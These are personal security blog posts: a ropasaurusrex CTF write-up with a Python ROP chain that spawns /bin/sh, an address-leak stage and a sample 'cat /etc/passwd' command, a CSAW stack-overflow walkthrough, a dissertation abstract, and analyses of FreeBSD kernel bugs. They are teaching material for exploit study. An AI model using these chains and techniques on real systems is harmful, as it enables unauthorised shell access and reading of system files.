Thursday, 5 June 2014

ROP ROP ROP

Return Oriented Programming (ROP) is all the rage! Well, almost, but it is needed when you can control the stack but cannot execute from it, i.e. when ASLR and NX are in play. In this post I present my solution to ropasaurusrex, which leverages ROP. First the overflow:


It really doesn't get easier than this. There is a buffer on the stack which is much smaller than 256 bytes, and there is a read of 256 bytes into that buffer. We overwrite the return address and set the EIP free. The leave instruction in the epilogue means that we can't just find a 'jmp esp' somewhere and easily use it. Also, I wanted to practice my ROP skills so I didn't consider any other exploitation vectors. So, we are going to build a ROP stack.

Aside from our binary there are two loaded modules:
(gdb) info sharedlibrary  
From        To          Syms Read   Shared Object Library 
0xf7e2f420  0xf7f5e6ee  Yes (*)     /lib32/libc.so.6 
0xf7fdc860  0xf7ff47ac  Yes (*)     /lib/ld-linux.so.2
I will be using libc for finding my gadgets. What are gadgets? Using ROP is like lining up dominoes and then letting them fall in some path. The only difference is that in ROP we might actually be able to make decisions because we can point to conditional instructions. In this case gadgets are the domino pieces that we line up by placing their addresses on the stack. The addresses are 'return' addresses pointing to the next gadget as if the next gadget has actually called the previous. Probably a convoluted explanation but it will make sense soon.

Imagine you have the following C code:
int a = 0; 
void A() { a++; return; } 
void B() { A(); a += 2; return; } 
void C() { B(); a += 3; return; }
That, in essence, represents what a ROP chain is: a list of gadgets. Starting with function C, by the time function A is invoked the stack will contain return addresses back to functions C and B, in order. The actual useful 'work' parts are the increments of the variable 'a'. For this to be a proper ROP chain we will logically take out all the call instructions to any of the functions and just pretend that they happened. Then we will point EIP to the 'a++' statement and let the code run. We want to do that because we want function A to do its operation first. When A returns, it will return 'back' to B, executing 'a += 2', and so on.
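To make the analogy concrete, here is a toy Python model of that chain. It is only a sketch: the gadget functions and the run_chain helper are made-up names for illustration, and a Python list stands in for the stack of return addresses.

```python
# Toy model of a ROP chain: each "gadget" does a bit of work and then
# "returns", which here means popping the next entry off a fake stack.
state = {"a": 0}

def gadget_a():          # tail of A(): a++; ret
    state["a"] += 1

def gadget_b():          # tail of B(): a += 2; ret
    state["a"] += 2

def gadget_c():          # tail of C(): a += 3; ret
    state["a"] += 3

def run_chain(first, stack):
    """Run `first`, then keep 'returning' into whatever is on the stack."""
    gadget = first
    while gadget is not None:
        gadget()
        gadget = stack.pop() if stack else None   # the 'ret'
    return state["a"]

# Return addresses as they would sit on the stack. The end of the list is
# the top of the stack, so B's tail is popped before C's tail.
stack = [gadget_c, gadget_b]
result = run_chain(gadget_a, stack)   # no call instruction ever executed
```

No function in the chain ever calls another; the order of execution comes entirely from what was placed on the stack beforehand.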

With this logic we can set up a theoretically arbitrary control flow. ROP has been shown to be Turing complete [1], although in practice that might be tougher to achieve. There is also a similar method called Jump Oriented Programming [2] (JOP), which uses a dispatch address table and jump instructions to control the flow of execution. It is similar to how C-style switch statements operate.

Back to our code. The EIP is trivially controlled, so let's talk about what we will do with it. To practice ROP I have disabled ASLR on my virtual machine by writing 0 to /proc/sys/kernel/randomize_va_space. I will be looking at leaking addresses next time. Disabling ASLR allows me to make assumptions about where my libc module is loaded at the time of exploitation.

The target application reads and writes on standard I/O. This means that I will be feeding the exploit through a pipe on the command line. So, to get the ropasaurus to execute my commands, I will have it execve a shell and then have access to any sort of shell command. For this we will need the execve shellcode... but in ROP form.

We will use the execve system call (number 0xB on 32-bit x86) via interrupt 0x80. So, somehow, we need to set up the registers as follows. Remember that Linux system calls expect parameters to be passed in registers.

    EAX = 0xB              // System call number
    EBX = PTR to "/bin/sh" // File to execute
    ECX = NULL             // Program arguments
    EDX = NULL             // Program environment

Once the registers are set up we call interrupt 0x80 and the kernel takes care of the rest. I like this method because there is no need to do any clean up. The only thing we should be aware of is that the shell will start reading STDIN looking for commands. This happens after ropasaurus has read 256 bytes. So our exploit buffer needs to contain the shell commands after the first 256 bytes (e.g. cat /etc/passwd).
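The layout of the data piped into the target can be sketched as follows. This is Python 3 and purely illustrative: build_stdin_stream is a hypothetical helper name, and padding with 'A' bytes is an assumption, since any filler would do.

```python
STAGE_SIZE = 256  # ropasaurusrex reads exactly this many bytes

def build_stdin_stream(rop_payload, commands):
    """Pad the ROP payload to 256 bytes, then append shell commands.

    The target consumes the first 256 bytes; whatever follows is still
    sitting on STDIN when the spawned shell starts reading.
    """
    if len(rop_payload) > STAGE_SIZE:
        raise ValueError("payload does not fit in the 256-byte read")
    stage = rop_payload.ljust(STAGE_SIZE, b"A")   # filler byte is arbitrary
    tail = b"".join(cmd.encode() + b"\n" for cmd in commands)
    return stage + tail

# Placeholder payload bytes, followed by the command the shell should run.
example = build_stdin_stream(b"\x00" * 16, ["cat /etc/passwd"])
```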

At the minimum we want to replicate the functionality of this code:

(Courtesy of the Online Disassembler)

We do this by finding gadgets in the libc image. Using an online tool, ropshell, I was able to generate a searchable list of all possible gadgets. Basically, those are all the instruction sequences that end with a return or a jump instruction.

So we put together a "shellcode" sequence that looks like this. Think of it as a sequence of pointers to the instructions to be executed, not the actual instruction bytes sent to the program. At the beginning I noticed that ECX holds the pointer to our buffer. So I need to pivot the stack and have ESP point to it. We point the EIP to the first instruction:

    pop edx      'preparing for the next jmp.
    ret
    mov esp, ecx 'stack pivot
    jmp edx      
    pop ecx      'now at the beginning
    pop eax      '[pop #1]
    ret

This sequence allows us to "wrap" around ESP to the beginning of our buffer which gives us more space to play. Considering how the overflow worked this might not have been entirely necessary as there would probably be enough space to write the rest of the ROP chain. But it's done now.

In each case the ret and jmp instructions are set up such that they point to the next instruction to execute. In reality the EIP is jumping all around the libc text section. Next, we set up the registers to prepare for the system call.

    push esp
    pop ebx       'point near /bin/sh
    pop esi
    ret
    add ebx, eax  '[pop #1] adjusts ebx
    add eax, 2
    ret
    pop edx       'program environment
    ret
    add al, -0x17 'set EAX to 0xB
    ret
    int 0x80

Done. Once this sequence executes we will have the shell. Notice that it is far less straightforward than the nice, no-hacking solution. Here we use EAX to adjust the EBX pointer before it is fixed up to be the system call number. The stack buffer is built up using this Python code:

buf += uint(0)            # the ecx for g2
buf += uint( (0xB + 0x17 - 2) ) # the eax for g2
buf += gadget(0x0010D251) # ret of g2 going to g3:
buf += 'AAAA'             # value for esi of g3
buf += gadget(0x00143242) # g4: add ebx, eax; add eax, 2; ret
buf += gadget(0x0002E3CC) # g7: pop edx; ret
buf += uint(0)            # value of edx for g7
buf += gadget(0x0010A44D) # g6: add al, -0x17, ret
buf += gadget(0x000EA621) # g5: int 0x80
buf += '/bin'
buf += '/sh\x00'
buf += "/bin/bash\x00"

buf = padwith(buf, 0x100-4*29)

# return address (initial EIP)
buf += gadget(0x0002E3CC) # g0: pop edx; ret

buf += gadget(0x000EE100) # value of edx for gadget 0
buf += gadget(0x0002E49D) # g1: mov esp, ecx; jmp edx

buf = padwith(buf, 0x100) # make exactly 256 bytes
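The listing relies on three helpers, uint, gadget and padwith, that are not shown. A minimal sketch of what they might look like follows, in Python 3 with bytes rather than strings. The LIBC_BASE value is a placeholder assumption, not the real load address, and the 'A' filler is also assumed.

```python
import struct

LIBC_BASE = 0xF7E16000  # placeholder: substitute the real libc load address

def uint(value):
    """Pack a 32-bit little-endian integer, as x86 expects on the stack."""
    return struct.pack("<I", value & 0xFFFFFFFF)

def gadget(offset, base=LIBC_BASE):
    """Turn a gadget offset from the gadget list into an absolute address."""
    return uint(base + offset)

def padwith(buf, size, fill=b"A"):
    """Pad buf with filler bytes up to exactly `size` bytes."""
    if len(buf) > size:
        raise ValueError("buffer already longer than the requested size")
    return buf + fill * (size - len(buf))

# The EAX seed used in the chain: 0xB + 0x17 - 2 = 0x20. After
# 'add eax, 2' it is 0x22, and 'add al, -0x17' leaves 0xB (execve).
eax_seed = uint(0xB + 0x17 - 2)
```

With these in place, 0x100-4*29 works out to 140, so the first part of the chain is padded to 140 bytes before the initial return address is appended.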

The addresses are the values given by the ROPShell tool, but the Python code outputs the corrected addresses using the base address of libc. Once executed we can feed in any sort of shell commands that we want:


ROP.

Update: I couldn't just let this one go without a full exploit. I've spent a little bit more time and developed a mechanism to leak out an address of a function within libc which gave me a chance to calculate the base address of the libc module.

The exploit works like this. First we send in 256 bytes to leak out an address, then we send 256 bytes to execute a shell. It's a two-stage exploit, which also means that it becomes interactive.

First, we notice that the binary was compiled without RELRO which means that the GOT PLT will be at a known address. The PLT contains dynamically generated addresses to library functions. There is a good write up of how it works on the ISISBlogs. So, we need to figure out a way to get those addresses.

The way I've done it is to point the initial return address to the write function in the PLT entry and on the stack I've put in the parameters for the write call. Essentially I simulate the call to write once the function containing a read returns. This write will send back 0x1C bytes of the PLT - the entire table. On the same stack I put in the address of the main function, so that I could start the process again allowing me another shot at the bug knowing the location of the write function. At this point, see the beginning of the blog.

The code for the leak looks like this:

   buf = padwith(buf, 0x100-4*29)

   # return address (initial EIP)
   buf += addr(0x08048312) # point to write@plt
   buf += addr(0x0804841D) # return main 
   buf += uint(1)          # STDOUT
   buf += uint(0x08049614) # point to the plt for write
   buf += uint(0x1c)       # write buffer size

   buf = padwith(buf, 0x100) 

Works every time.
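Turning the leaked bytes into a libc base is simple arithmetic. The sketch below is Python 3 and makes several assumptions: the leak is 0x1c bytes of little-endian 32-bit pointers, the first one is the resolved address of write, and HYPOTHETICAL_WRITE_OFFSET is a made-up offset that has to be replaced with the real offset of write in the target's libc.

```python
import struct

HYPOTHETICAL_WRITE_OFFSET = 0x000DB234  # made-up; look it up in the real libc

def parse_leak(leak):
    """Split the leaked table into 32-bit little-endian pointers."""
    if len(leak) % 4 != 0:
        raise ValueError("leak is not a whole number of 32-bit words")
    count = len(leak) // 4
    return list(struct.unpack("<%dI" % count, leak))

def libc_base(leaked_write, write_offset):
    """Base address = resolved address of write minus its offset in libc."""
    return (leaked_write - write_offset) & 0xFFFFFFFF

# A fake 0x1c-byte leak standing in for what the target would send back.
fake_leak = struct.pack("<7I", 0xF7EF1234, 0, 0, 0, 0, 0, 0)
pointers = parse_leak(fake_leak)
base = libc_base(pointers[0], HYPOTHETICAL_WRITE_OFFSET)
```

A quick sanity check on a real run is that the computed base should be page aligned, meaning its low 12 bits are zero.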

---------------------

[1] E. Buchanan, R. Roemer, H. Shacham, and S. Savage. When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC. In 15th ACM CCS, pages 27–38, New York, NY, USA, 2008. ACM.

[2] T. Bletsch, X. Jiang, V. Freeh and Z. Liang. Jump-Oriented Programming: A New Class of Code-Reuse Attack. ASIACCS ’11, March 22–24, 2011, Hong Kong, China.

Thursday, 22 May 2014

The winter of 2014 was cold.

During January and February of 2014 I set myself an objective: to finish the master's dissertation to the point of submission. I also learned that picking a hard topic was probably not the best idea, but it was certainly rewarding. Nonetheless, I still received a distinction (the Oxford version of an A) for the work. So, I'm happy to share it with the world, welcoming any sort of feedback.

If you're interested you can read the full paper here: The full paper

Abstract
Personal computing devices and servers are becoming more powerful by the day through hardware parallelisation. Such advances require developers to look into concurrency in order to take advantage of the new computing power. However, much of the code is written without formal verification and checked only heuristically through unit or other tests. This dissertation will show how Communicating Sequential Processes (CSP) can be used to detect errors in an application that supports concurrent execution. This is done by isolating common concurrency problems and mapping them into CSP representations. Finally, the Failures-Divergences Refinement (FDR) software package is used to perform refinement checks to detect the errors in the source code. This process allows the developer to build assertions that their code must pass to prove its correctness.


Acknowledgements
I would like to thank my advisor, Dr. Andrew Simpson, and the Software Engineering Program staff for their guidance and quick responses. This project could not have been accomplished without the generosity, patience and accommodation of the family scholarship fund. I am particularly grateful to the American people for providing the opportunity and the Lithuanian people for their infinitely delicious food and heavenly honey. Finally, I wish to thank my wife, Diana, for her love, support and conversation. 

Wednesday, 21 May 2014

A simple one

CTF challenges can be great fun. One evening I had a few minutes and decided to work a simple one from CSAW. It can be downloaded from shell-storm.org. Here's the breakdown:

A server listens on TCP port 31338. It forks on each connection, creating a new process for each client. The server sends some data and reads some data into a buffer. At that point the handling function either calls exit or returns. The last part is interesting because on return the exploit can succeed and gain execution. If the exploit fails to set up the stack correctly, the process will exit without gaining execution.

This challenge is a good starter, although I would not expect this sort of situation to come up anymore, except perhaps in old or deliberately bad software. It was more common in the 90's. The value of the exercise is in going through the motions of learning how stack corruption vulnerabilities work.

First, a connection comes in. The server forks to create a new process:


The handle function is called with the client socket file descriptor as the first parameter. Here we see a modern compiler convention to place the parameters on the stack using a mov instruction. Older compilers usually use the push instruction. The end result is the same because at the time of the call the first thing on the stack (i.e. [esp]) is the first parameter. This fits the calling convention used by the called function.

The handle function has several things in its stack frame: buffer, some byte variable, 32bit integer:


We see that the buffer is 2047 bytes in size, judging by its large offset. Specifically, that is the distance between the buffer and the next variable: 0x80C - 0xD, which is 2060 - 13 = 2047. I called the next variable 'zero' because that is the value that will be assigned to it after the overflow happens. The cookie actually simulates a stack canary, implemented early on by compilers to protect against stack-based buffer overflows. We'll see later how that can be overcome for this challenge.

The cookie will contain a random value seeded off of the time that the handle function runs. At first glance I was thinking that we would have to try to guess it based on the approximate time of the server. But it gets better. Here we can see the assignment:


We can also see that the cookie is being saved off to a location in the data segment called secret. Later, that is how the function will know if the cookie has been corrupted.

Let's look at the next interesting chunk of code:


There are two calls to the send function. First one loads the address of the buffer as the parameter which actually sends the stack location of the buffer. Second send loads up the cookie and sends that to the client. So we really have all information we need. This would also explain the funny characters we get upon connection to the server.


Finally, the overflow occurs when the receive function is called. That is because it reads 4096 bytes into a 2047 byte buffer. 


After the receive, the zero variable is assigned a zero value (just one byte). This is here just to make things slightly harder for you. Next the cookie is checked against the secret value. If the values match then the function jumps away to return. The return is what will trigger the exploit and give us code execution. If the values do not match, then the code falls through and executes exit.


So the stack looks like this:
(low addr)
 [ 2047 bytes ] | [ zero byte] | [cookie] | [ few registers ] | [return addr] | [ socket]
(high addr)

This means that we need to write to the socket a value large enough to overwrite the return address which will become the EIP when the retn instruction is executed. So the actual exploit looks like this:


This code will read from the socket the address of the buffer and the cookie which will allow us to put those values into the exploit string.
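For readers without the screenshot, the shape of such an exploit can be sketched in Python 3. Several things here are assumptions rather than facts from the binary: the address and the cookie are taken to arrive as two 4-byte little-endian values, saved_len (the size of the "few registers" gap) is a parameter you would read off the disassembly, and the shellcode is whatever the caller supplies.

```python
import struct

BUF_SIZE = 2047  # size of the stack buffer, from the frame layout above

def parse_greeting(data):
    """Split the server's greeting into (buffer address, cookie)."""
    buf_addr, cookie = struct.unpack("<II", data[:8])
    return buf_addr, cookie

def build_payload(buf_addr, cookie, shellcode, saved_len):
    """Lay out the bytes to match the stack diagram, low to high address."""
    if len(shellcode) > BUF_SIZE:
        raise ValueError("shellcode does not fit in the buffer")
    payload = shellcode.ljust(BUF_SIZE, b"\x90")  # fill the 2047-byte buffer
    payload += b"\x00"                     # 'zero' byte; server zeroes it anyway
    payload += struct.pack("<I", cookie)   # echo the cookie back unchanged
    payload += b"B" * saved_len            # saved registers (size is assumed)
    payload += struct.pack("<I", buf_addr) # return address -> start of buffer
    return payload

# Example with made-up values standing in for what the server would send.
addr, cookie = parse_greeting(struct.pack("<II", 0xBFFFE000, 0x12345678))
payload = build_payload(addr, cookie, b"\xcc", saved_len=12)
```

Sending the payload is then a matter of connecting to port 31338, reading the greeting, and writing the result of build_payload back to the socket.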

Simple! Right? Well, not if you've never done this before.

Saturday, 25 January 2014

FreeBSD-SA-09:14.devfs

At about the same time as the pipe vulnerability, a devfs race condition was discovered. This vulnerability manifested itself as the use of an uninitialized vnode pointer. The pointer would be NULL and could be used by another process before it was assigned to an actual vnode. The vulnerability doesn't have a specific "place" in the code because it is a product of how devfs and vfs interact. However, the fix was made in devfs.

The bug turned out to be exploitable, with the exploit nicely described in an XORL blog post. I will be going into a little more detail about the code paths leading to the vulnerability.

First a process tries to open a devfs file (e.g. /dev/null or similar). This is done through the open system call, which eventually executes the kern_open kernel function.

int
kern_open(struct thread *td, char *path, enum uio_seg pathseg, int flags, int mode)
{
        ....
        /* An extra reference on `nfp' has been held for us by falloc(). */
        fp = nfp;
        cmode = ((mode &~ fdp->fd_cmask) & ALLPERMS) &~ S_ISTXT;
        NDINIT(&nd, LOOKUP, FOLLOW, pathseg, path, td);
        td->td_dupfd = -1; /* XXX check for fdopen */
        error = vn_open(&nd, &flags, cmode, indx);
        ...
}
Almost at the very beginning the call goes down the path of vn_open which executes the VFS specific functionalities. vn_open performs many checks, such as does the user have access to the file or are the access flags correct? It eventually passes control to the devfs subsystem for the actual device opening:

int
vn_open_cred(ndp, flagp, cmode, cred, fdidx)
        struct nameidata *ndp;
        int *flagp, cmode;
        struct ucred *cred;
        int fdidx;
{
        ...
restart:
        vfslocked = 0;
        fmode = *flagp;
        ...
                ndp->ni_cnd.cn_nameiop = LOOKUP;
                ndp->ni_cnd.cn_flags = ISOPEN |
                    ((fmode & O_NOFOLLOW) ? NOFOLLOW : FOLLOW) |
                    LOCKSHARED | LOCKLEAF | MPSAFE;
                if ((error = namei(ndp)) != 0)
                        return (error);
                ndp->ni_cnd.cn_flags &= ~MPSAFE;
                vfslocked = (ndp->ni_cnd.cn_flags & GIANTHELD) != 0;
                vp = ndp->ni_vp;
        }
        ...
        if ((error = VOP_OPEN(vp, fmode, cred, td, fdidx)) != 0)
                goto bad;
        if (fmode & FWRITE)
                vp->v_writecount++;
        *flagp = fmode;
        ASSERT_VOP_LOCKED(vp, "vn_open_cred");
        if (fdidx == -1)
                VFS_UNLOCK_GIANT(vfslocked);
        return (0);
bad:
        NDFREE(ndp, NDF_ONLY_PNBUF);
        vput(vp);
        VFS_UNLOCK_GIANT(vfslocked);
        *flagp = fmode;
        ndp->ni_vp = NULL;
        return (error);
}
Here the call is passed through to devfs via the VOP_OPEN macro call.
static int
devfs_open(struct vop_open_args *ap)
{
        ...
        dsw = dev_refthread(dev);
        if (dsw == NULL)
                return (ENXIO);
        /* XXX: Special casing of ttys for deadfs.  Probably redundant. */
        if (dsw->d_flags & D_TTY)
                vp->v_vflag |= VV_ISTTY;
        VOP_UNLOCK(vp, 0, td);
        ...
        vn_lock(vp, LK_EXCLUSIVE | LK_RETRY, td);
        dev_relthread(dev);
        ...
        fp = ap->a_td->td_proc->p_fd->fd_ofiles[ap->a_fdidx];
        KASSERT(fp->f_ops == &badfileops,
            ("Could not vnode bypass device on fdops %p", fp->f_ops));
        fp->f_ops = &devfs_ops_f;
        fp->f_data = dev;
        return (error);
}
So far so good, nothing terribly bad has happened, there is no memory corruption. However, the problem is that right after the VOP_UNLOCK(vp, 0, td) call another thread can start using the file descriptor. If the second thread does not check the vnode pointer then it would be in trouble. At this point the kernel has not assigned the vnode to the file descriptor (fp) structure.

This assignment happens later in the kern_open call in the same execution thread. In fact, it happens just before the function returns to the user land.
int
kern_open(struct thread *td, char *path, enum uio_seg pathseg, int flags,
    int mode)
{
        ...
        FILEDESC_LOCK(fdp);
        FILE_LOCK(fp);
        if (fp->f_count == 1) {
                mp = vp->v_mount;
                KASSERT(fdp->fd_ofiles[indx] != fp,
                    ("Open file descriptor lost all refs"));
                FILE_UNLOCK(fp);
                FILEDESC_UNLOCK(fdp);
                VOP_UNLOCK(vp, 0, td);
                vn_close(vp, flags & FMASK, fp->f_cred, td);
                VFS_UNLOCK_GIANT(vfslocked);
                fdrop(fp, td);
                td->td_retval[0] = indx;
                return (0);
        }
        fp->f_vnode = vp;
        if (fp->f_data == NULL)
                fp->f_data = vp;
        fp->f_flag = flags & FMASK;
        if (fp->f_ops == &badfileops)
                fp->f_ops = &vnops;
        fp->f_seqcount = 1;
        fp->f_type = (vp->v_type == VFIFO ? DTYPE_FIFO : DTYPE_VNODE);
        FILE_UNLOCK(fp);
        FILEDESC_UNLOCK(fdp);
        ...
}
The assignment fp->f_vnode = vp in the listing above is where it happens. As mentioned before, by that time it is too late, and there is a danger that the pointer has already been used. That is exactly what happens in the exploit code. The fix was to go back to the devfs_open call, break the abstraction, and assign the vnode to the file descriptor right after the unlock happens.
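The window can be illustrated with a deliberately simplified Python model. This is not kernel code: the File class and the three functions are hypothetical stand-ins, and the "second thread" is simulated by simply calling it between the two steps rather than by real concurrency.

```python
class File:
    """Stand-in for the kernel's struct file, with only two fields."""
    def __init__(self):
        self.f_ops = "badfileops"   # state right after falloc()
        self.f_vnode = None         # NULL until kern_open assigns it

def devfs_open_step(fp):
    # devfs_open installs the devfs operations, so the descriptor
    # now looks usable to anyone else who looks it up.
    fp.f_ops = "devfs_ops_f"

def kern_open_finish(fp, vp):
    # Much later, back in kern_open, the vnode is finally attached.
    fp.f_vnode = vp

def other_thread_uses(fp):
    """A second thread that trusts fp as soon as f_ops is set."""
    if fp.f_ops == "badfileops":
        return "not ready"
    if fp.f_vnode is None:
        return "NULL vnode dereference"
    return "ok"

fp = File()
devfs_open_step(fp)
during_window = other_thread_uses(fp)   # lands inside the race window
kern_open_finish(fp, vp="vnode")
after_window = other_thread_uses(fp)    # same call, now harmless
```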

Saturday, 18 January 2014

FreeBSD-SA-09:13.pipe

Code seems to age much quicker than anything else. Way back - not so long ago - in 2009 there was a bug in the FreeBSD kernel PIPE and EVENT handling code. This turned out to be exploitable in versions 6.x of the kernel. It was never truly patched; however, the code was redesigned in order to eliminate a whole set of potential vulnerabilities, including this one. The bug was published in the FreeBSD security advisory FreeBSD-SA-09:13.pipe.asc. A proof of concept exploit is available for this vulnerability: http://www.frasunek.com/pipe.txt.

For this analysis I needed to figure out what sequences of events lead to the vulnerability manifestation. I won't go into details about how the corruption happened and how the exploit works. Also, I haven't actually tried to execute it - so, I'm merely assuming that it works.

Unless you know the details of how kqueues, knote lists and pipes work, this vulnerability is actually quite hard to spot even if the patch is available. The patch covers a lot of code and does not highlight the bug itself. So, if for some strange reason you're trying to figure out this vulnerability then this post should give you the initial steps.

The vulnerable version of the kernel is still available in the current (as of this writing) FreeBSD SVN: http://svnweb.freebsd.org/base/release/6.0.0/. All analysis below follows that code.

We start with function pipe_close which gets called via the close system call.
static int
pipe_close(fp, td)
    struct file *fp;
    struct thread *td;
{
    struct pipe *cpipe = fp->f_data;

    fp->f_ops = &badfileops;
    fp->f_data = NULL;
    funsetown(&cpipe->pipe_sigio);
    pipeclose(cpipe);
    return (0);
}
This function obtains the pipe structure and passes it on to the pipeclose function. It is important to note that a pipe has two ends, read and write, but it is one entity. The pipe pair is allocated from the same UMA (Universal Memory Allocator) zone as one chunk of memory. So the read and write pipes really refer to the same general space.

Pipeclose then obtains the pair and tries to flush the pipe and clear out any knotes attached to it. A knote is a special mechanism used for kernel to user event notification. In very basic terms it is a select optimized for a special case. In select the user has to pass a whole list of identifiers to the kernel while with a knote a user subscribes to a filter (the event criteria) and allows for a much more granular event notification. The user process maintains a kqueue of the events it is listening on while each identifier being listened on maintains a knote linked list to know who to notify. A much more detailed description of this mechanism can be found in this paper: kqueue.pdf.

Once various closing/flushing processes are complete the pipeclose function tries to clear out the pipe by starting with the knote list. About half way down the list, the following sequence is executed:
static void
pipeclose(cpipe)
      struct pipe *cpipe;
{
      struct pipepair *pp;
      struct pipe *ppipe;
      .....
      PIPE_UNLOCK(cpipe);
      pipe_free_kmem(cpipe);
      PIPE_LOCK(cpipe);
      cpipe->pipe_present = 0;
      pipeunlock(cpipe);
      knlist_clear(&cpipe->pipe_sel.si_note, 1);
      knlist_destroy(&cpipe->pipe_sel.si_note);
      .....
}


Can you spot the bug? The above code is basically it. I wouldn't expect you to, unless you're a kernel hacker for this particular portion of the kernel. Specifically, the last two lines in the above listing cause the problem.

  • The PIPE_LOCK mutex isn't protecting the pipe, it is protecting the pipelock mutex.
  • The pipe is UNLOCKED by the pipeunlock call before calls to knlist_clear and knlist_destroy are made.
This means that two processes can be calling knlist_clear and knlist_destroy unsafely. Both of those functions are not thread safe. So, it can happen that a linked list of knotes for the pipe is reinitialized (via the destroy call) while it is still being cleared. The clearing is a blocking procedure that sends out notifications to processes on the knote list. While the clearing function is traversing the same linked list it could easily be destroyed by another process because that process sees an already cleared list.
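A toy Python model shows how an unlocked clear and destroy can step on each other. It is only a sketch of the interleaving, not the kernel's data structures: Knote, Knlist and both functions are simplified stand-ins, and a generator's yield marks the point where the real clear call could block.

```python
class Knote:
    def __init__(self, name):
        self.name = name
        self.next = None

class Knlist:
    def __init__(self):
        self.head = None

    def insert(self, kn):
        kn.next = self.head
        self.head = kn

def knlist_clear(kl):
    """Generator: yields wherever the real call might sleep."""
    while kl.head is not None:
        kn = kl.head
        yield kn.name        # blocking notification, no lock held
        kl.head = kn.next    # unlink using a pointer read before sleeping

def knlist_destroy(kl):
    kl.head = None           # reinitialise the list

kl = Knlist()
kl.insert(Knote("k1"))
kl.insert(Knote("k2"))       # list is now k2 -> k1

clearer = knlist_clear(kl)
first = next(clearer)        # process 1 blocks while notifying k2
knlist_destroy(kl)           # process 2 destroys the list meanwhile
second = next(clearer)       # process 1 wakes up and keeps going
resurrected = kl.head is not None
```

After the destroy, the first process writes a stale pointer back into the list head, so the "destroyed" list is populated again.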





Thursday, 9 January 2014

FreeBSD-SA-10:09.pseudofs

Older FreeBSD 7 and 8 versions had a bug in the pseudofs module - back in 2010. This bug manifested through an unnecessary mutex release which turned out to be exploitable through a NULL pointer dereference. In this post I will do a walk through to show the events that lead up to the bug. For more information check out the security advisory: FreeBSD-SA-10:09.pseudofs.asc. There is also a proof of concept exploit available on Security Focus.

The chain starts with a call to extattr_get_link in kern/vfs_extattr.c
ssize_t extattr_get_link(const char *path, int attrnamespace,
const char *attrname, void *data, size_t nbytes);
This call obtains extended attributes from a vnode. The function looks like this:
int extattr_get_link(td, uap)
        struct thread *td;
        struct extattr_get_link_args /* {
                const char *path;
                int attrnamespace;
                const char *attrname;
                void *data;
                size_t nbytes;
        } */ *uap;
{
        ...
        vfslocked = NDHASGIANT(&nd);
        error = extattr_get_vp(nd.ni_vp, uap->attrnamespace, attrname,
            uap->data, uap->nbytes, td);
        vrele(nd.ni_vp);
        VFS_UNLOCK_GIANT(vfslocked);
        return (error);
}
The important part is the call to extattr_get_vp. This is essentially a wrapper adding a few bells and whistles to the process.
static int
extattr_get_vp(struct vnode *vp, int attrnamespace, const char *attrname,
    void *data, size_t nbytes, struct thread *td)
{
        struct uio auio, *auiop;
        struct iovec aiov;
        ssize_t cnt;
        size_t size, *sizep;
        int error;
        VFS_ASSERT_GIANT(vp->v_mount);
        vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
        ...

        error = VOP_GETEXTATTR(vp, attrnamespace, attrname, auiop, sizep,
            td->td_ucred, td);
        if (auiop != NULL) {
                cnt -= auio.uio_resid;
                td->td_retval[0] = cnt;
        } else
                td->td_retval[0] = size;
done:
        VOP_UNLOCK(vp, 0);
        return (error);
}
We are starting to see a few statements directly relating to the vulnerability. First there is the vn_lock
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
which takes in the vnode pointer that we are interested in. This is the call that locks the vnode and the mutex in question. The code for that is slightly convoluted. Instead of using mtx_lock, it works by invoking the lock manager.
// in kern/vfs_vnops.c
#define vn_lock(vp, flags) _vn_lock(vp, flags, __FILE__, __LINE__)

int
_vn_lock(struct vnode *vp, int flags, char *file, int line)
{
        int error;
        VNASSERT((flags & LK_TYPE_MASK) != 0, vp,
            ("vn_lock called with no locktype."));
        do {
                ...
                error = VOP_LOCK1(vp, flags, file, line);
                flags &= ~LK_INTERLOCK; /* Interlock is always dropped. */
                ...
        } while (flags & LK_RETRY && error != 0);
        return (error);
}
The function passes control to the VOP_LOCK1 macro. Here the control goes into the custom pseudofs territory. The module, however, does not implement the lock function and so a default locking function is used.
// kern/vfs_default.c
int
vop_stdlock(ap)
        struct vop_lock1_args /* {
                struct vnode *a_vp;
                int a_flags;
                char *file;
                int line;
        } */ *ap;
{
        struct vnode *vp = ap->a_vp;
        return (_lockmgr_args(vp->v_vnlock, ap->a_flags, VI_MTX(vp),
            LK_WMESG_DEFAULT, LK_PRIO_DEFAULT, LK_TIMO_DEFAULT, ap->a_file,
            ap->a_line));
}
Here we see that the default implementation passes the lock, vp->v_vnlock, to the lock manager via the _lockmgr_args function - a function too complex to show here and unnecessary for my purposes. The mutex is officially locked. Going back to extattr_get_vp we see a call to VOP_GETEXTATTR
error = VOP_GETEXTATTR(vp, attrnamespace, attrname, auiop, sizep,
    td->td_ucred, td);
This macro sends us to the module code where the actual extended attribute extraction occurs. The call resolves to the pfs_getextattr function through various function pointer magic. While essentially a wrapping function, akin to the Java synchronized block, this is where the bug lives.
static int
pfs_getextattr(struct vop_getextattr_args *va)
{
        struct vnode *vn = va->a_vp;
        struct pfs_vdata *pvd = vn->v_data;
        struct pfs_node *pn = pvd->pvd_pn;
        struct proc *proc;
        int error;
        PFS_TRACE(("%s", pn->pn_name));
        pfs_assert_not_owned(pn);
        /*
         * This is necessary because either process' privileges may
         * have changed since the open() call.
         */
        if (!pfs_visible(curthread, pn, pvd->pvd_pid, &proc))
                PFS_RETURN (EIO);
        if (pn->pn_getextattr == NULL)
                error = EOPNOTSUPP;
        else
                error = pn_getextattr(curthread, proc, pn,
                    va->a_attrnamespace, va->a_name, va->a_uio,
                    va->a_size, va->a_cred);
        if (proc != NULL)
                PROC_UNLOCK(proc);

        pfs_unlock(pn); //<---- BUG
        PFS_RETURN (error);
}
That pfs_unlock call is the culprit. Taking in the same node we saw earlier in the VOP_LOCK1 call, it unlocks the mutex for the node. In retrospect the bug seems obvious. Why would the developer think that it is OK to mess with a mutex that was modified at a much higher abstraction layer? I'm sure there was a good reason at the time. Perhaps the code was refactored so that this unlocking step no longer made sense. Regardless, the line was here and it caused a vulnerability. pfs_unlock itself is a simple inline function defined in fs/pseudofs/pseudofs_internal.h
static inline void
pfs_unlock(struct pfs_node *pn)
{
        mtx_unlock(&pn->pn_mutex);
}
Now, for completeness, the other unlocking call happens back in the extattr_get_vp function through a call to a VOP function
static int
extattr_get_vp(struct vnode *vp, int attrnamespace, const char *attrname,
    void *data, size_t nbytes, struct thread *td)
{

        ...
